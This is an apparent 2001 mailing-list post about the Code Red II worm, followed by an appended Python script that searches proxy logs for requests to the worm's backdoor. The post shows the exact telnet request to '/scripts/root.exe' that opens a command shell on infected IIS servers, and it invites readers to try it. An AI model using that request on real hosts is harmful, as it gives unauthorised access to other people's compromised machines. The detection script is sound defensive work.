On Sun, Aug 05, 2001 at 11:39:27PM +1200, Perry Lorier wrote:

It's a new worm using the same infection vector. It is a lot more aggressive, and uses the fact that machines near to itself are likely to be good places to find crackable machines. If you have a lot of customers with cracked NT boxes you'll get a lot of scans. If you have a nice C space in the middle of nowhere with no windows machines anywhere near, you might have a rather boring night.

Hey, and it leaves a cool backdoor floating about. Look for recent infectors and telnet to them like such:

cw:0(a)weta(cw)$ telnet x.x.x.x 80
Trying x.x.x.x...
Connected to x.x.x.x.
Escape character is '^]'.
get /scripts/root.exe HTTP/0.9
HTTP/1.1 200 OK
Server: Microsoft-IIS/5.0
Date: Sun, 05 Aug 2001 11:39:46 GMT
Content-Type: application/octet-stream

Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.

c:\inetpub\scripts>

Cool :)

Start grepping those proxy logs people for lusers attempting to do this (it won't work via a proxy anyhow, but that's no reason not to hunt down the offending luser and beat them senseless).

--cw
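
The proxy-log hunt suggested at the end of the message, as an added example that is not part of the original post. It assumes a Squid proxy writing its native access.log format; the sample lines are constructed, and the function names are hypothetical. Matching on the decoded, lower-cased path catches case variants and percent-encoded spellings that a plain grep for the literal string would miss.

```python
import re
from collections import Counter
from urllib.parse import unquote, urlsplit

# Backdoor path shown in the message; IIS treats paths case-insensitively.
BACKDOOR_PATH = "/scripts/root.exe"

# Constructed sample lines (assumption: Squid native access.log format):
# time elapsed client action/status bytes method URL ident hierarchy type
SAMPLE_LOG = """\
997011586.123    210 192.0.2.17 TCP_MISS/200 512 GET http://198.51.100.9/scripts/root.exe - DIRECT/198.51.100.9 application/octet-stream
997011590.456     95 192.0.2.17 TCP_MISS/200 498 GET http://198.51.100.23/Scripts/ROOT.EXE?/c+dir - DIRECT/198.51.100.23 application/octet-stream
997011601.789     40 192.0.2.40 TCP_HIT/200 10240 GET http://www.example.org/index.html - NONE/- text/html
997011612.001    130 192.0.2.88 TCP_MISS/404 310 GET http://198.51.100.9/scripts/%72oot.exe - DIRECT/198.51.100.9 text/html
garbage line that is not a log entry
"""


def normalise_path(url):
    """Decode %xx escapes, unify slashes and lower-case the URL's path."""
    path = unquote(urlsplit(url).path).replace("\\", "/")
    return re.sub(r"/+", "/", path).lower()


def find_backdoor_requests(log_text):
    """Return (timestamp, client, status, url) for each backdoor request."""
    hits = []
    for line in log_text.splitlines():
        fields = line.split()
        # Skip anything that does not look like a native-format entry.
        if len(fields) < 7 or "/" not in fields[3]:
            continue
        ts, _elapsed, client, action, _size, _method, url = fields[:7]
        if normalise_path(url) == BACKDOOR_PATH:
            hits.append((ts, client, action.rsplit("/", 1)[1], url))
    return hits


def clients_by_hits(log_text):
    """Count backdoor requests per internal client address."""
    return Counter(hit[1] for hit in find_backdoor_requests(log_text))


if __name__ == "__main__":
    for client, count in clients_by_hits(SAMPLE_LOG).most_common():
        print(f"{client}\t{count} request(s) for {BACKDOOR_PATH}")
```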